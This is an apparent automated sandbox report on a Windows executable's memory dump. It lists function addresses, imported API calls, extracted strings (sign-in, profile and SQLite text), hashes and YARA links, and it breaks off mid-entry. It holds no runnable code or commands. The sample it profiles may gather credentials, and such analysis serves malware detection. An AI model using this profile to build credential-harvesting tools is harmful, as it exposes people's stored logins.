                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$Dialog$MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3975816621-0
                                                                                                                  • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                  • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                  • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                  • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                  Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                  • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                  • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                  • String ID: .save$http://$https://$log profile$signIn
                                                                                                                  • API String ID: 1214746602-2708368587
                                                                                                                  • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                  • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                  • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                  • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                  Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                                  • memset.MSVCRT ref: 00405E33
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                                  • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2313361498-0
                                                                                                                  • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                  • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                  • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                  • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                  Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                  • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                  • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                    • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                  • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                  • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ItemMessageRectSend$Client
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2047574939-0
                                                                                                                  • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                  • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                  • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                  • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                  Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                  • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                  • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                  • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID: gj
                                                                                                                  • API String ID: 438689982-4203073231
                                                                                                                  • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                  • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                  • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                  • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                  Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                  • API String ID: 3510742995-2446657581
                                                                                                                  • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                  • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                  • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                  • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                  Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                  • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                  • memset.MSVCRT ref: 00405ABB
                                                                                                                  • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                  • SetFocus.USER32(?), ref: 00405B76
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$FocusItemmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4281309102-0
                                                                                                                  • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                  • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                  • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                  • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                  Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintfwcscat
                                                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                  • API String ID: 384018552-4153097237
                                                                                                                  • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                  • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                  • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                  • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                  Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                  • String ID: 0$6
                                                                                                                  • API String ID: 2029023288-3849865405
                                                                                                                  • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                  • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                  • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                  • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                  Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                  • memset.MSVCRT ref: 00405455
                                                                                                                  • memset.MSVCRT ref: 0040546C
                                                                                                                  • memset.MSVCRT ref: 00405483
                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$memcpy$ErrorLast
                                                                                                                  • String ID: 6$\
                                                                                                                  • API String ID: 404372293-1284684873
                                                                                                                  • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                  • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                  • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                  • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                  Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                  • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                  • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                  • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                  • wcscpy.MSVCRT ref: 0040A107
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1331804452-0
                                                                                                                  • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                  • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                  Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                  • String ID: advapi32.dll
                                                                                                                  • API String ID: 2012295524-4050573280
                                                                                                                  • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                  • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                  • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                  • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                  Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • <%s>, xrefs: 004100A6
                                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                  • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                  • API String ID: 3473751417-2880344631
                                                                                                                  • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                  • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                  Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                                                  • String ID: %2.2X
                                                                                                                  • API String ID: 2521778956-791839006
                                                                                                                  • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                  • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                  Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintfwcscpy
                                                                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                  • API String ID: 999028693-502967061
                                                                                                                  • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                  • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                  • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                  • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                  Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • strlen.MSVCRT ref: 00408DFA
                                                                                                                    • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                  • memset.MSVCRT ref: 00408E46
                                                                                                                  • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                  • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memsetstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2350177629-0
                                                                                                                  • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                  • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                  • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                  • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                  Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                  • API String ID: 2221118986-1606337402
                                                                                                                  • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                  • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                  • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                  • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                  Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                  • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                                  • memset.MSVCRT ref: 00408FD4
                                                                                                                  • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                                  • memset.MSVCRT ref: 00409042
                                                                                                                  • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                    • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
